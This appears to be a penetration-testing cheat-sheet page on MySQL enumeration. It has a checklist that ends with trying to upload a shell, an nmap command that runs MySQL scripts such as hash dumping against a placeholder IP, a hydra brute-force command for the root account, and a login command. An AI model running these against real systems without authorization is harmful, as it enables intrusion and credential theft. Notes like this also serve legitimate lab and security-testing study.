Hack$Notes
Search…
MySQL Enum
MySQL enumeration

CheckList

  • Check for version
  • Try passwordless connection,authentication
  • If authenticated try to access database, tables.
  • See if you can upload shell.

MySQL nmap scripts

nmap -sV -Pn -vv 10.10.10.10 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

Brute-Force credentials

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.10 mysql -t 4

Try to login to MYSQL target

mysql -h 10.10.10.10 -u root -p
Last modified 1yr ago